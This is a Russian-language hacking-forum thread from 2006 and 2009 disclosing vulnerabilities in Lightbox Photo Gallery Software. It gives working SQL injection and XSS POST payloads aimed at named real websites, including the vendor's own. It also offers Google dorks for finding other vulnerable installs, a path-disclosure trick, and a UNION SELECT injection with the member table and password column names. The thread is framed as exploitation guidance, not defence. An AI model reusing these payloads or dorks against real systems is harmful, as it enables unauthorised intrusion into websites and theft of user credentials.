Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Множественные уязвимости в платной фотогалерее Lightbox Photo Gallery Software (https://forum.antichat.xyz/showthread.php?t=27179)

1ten0.0net1 13.11.2006 20:41

Множественные уязвимости в платной фотогалерее Lightbox Photo Gallery Software
 
В версиях Advanced и Proffessional существует возможность проведения SQL - injection из-за отсутствия фильтрации спец. символов в переменной search_fields[]в скрипте adSearch.php (расширенный поиск).

Пример:
_http://www.gardenvisit.com/royalty-free-images/photos/adSearch.php
Код:

POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=ipts))/*&operand=OR&submit=Search
Во всех версиях существует возможность проведения XSS (в этом скрипте это может быть использовано, напрмер, для доступа к приватной фотогалерее..)

Уязвимы 2 параметра: email и category.

Пример:
_http://lightbox.adventistevangelism.com/index.php
POST: category=%3Ch1%3EHidook!


Google trick (dorks):
SQL:
Powered by Lightbox Photo Gallery Software & VSS ADVANCED SEARCH
XSS: inurl:lightbox inurl:category

По хорошей традиции решил проверить сайт разработчика бажного скрипта и вот что нашёл:

_http://www.lightboxphoto.com/phpinfo.php
Старенький Линух.
Наша XSS:
_http://www.lightboxphoto.com/sales_gallery/index.php
POST: lightbox=&category=%3Ch1%3EOumph!%3C/h1%3E

Наша SQL:
_http://www.lightboxphoto.com/gallery_software_ent_demo/adSearch.php
Код:

POST: search_mode=search&keyword=%27&search_in=all&search_fields%5B%5D=dis_name&search_fields%5B%5D=description&search_fields%5B%5D=author&search_fields%5B%5D=copyright&search_fields%5B%5D=keywords&search_fields%5B%5D=iptn))/*&operand=OR&submit=Search

Кроме того можно узнать полный путь из-за отсутствия
фильтрации переменных, передаваемых в cookies. (возможно, это справедливо для всех сайтов, на которых установлен данный скрипт....)

Warning: Cannot modify header information - headers already sent by (output started at
/home/lightbox/public_html/sales_gallery/include/session_save_path.inc.php:7) in /home/lightbox/public_html/sales_gallery/include/session.inc.php on line 26


P. S. Настоятельно рекомендуя проверять скрипт на наличие директории config.

aka PSIH 16.01.2009 19:41

Lightbox Photo Gallery Software

еще SQL-injection
Цитата:

/index.php?pageId=100&id=-999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
таблики:
Цитата:

vss_category_members:id
vss_category_members:category_path
vss_category_members:category_name
vss_category_members:username
vss_category_members:last_update
vss_category_members: password
либо:
vss_members:id
vss_members:category_path
vss_members:category_name
vss_members:username
vss_members:last_update
vss_members: password


Время: 16:49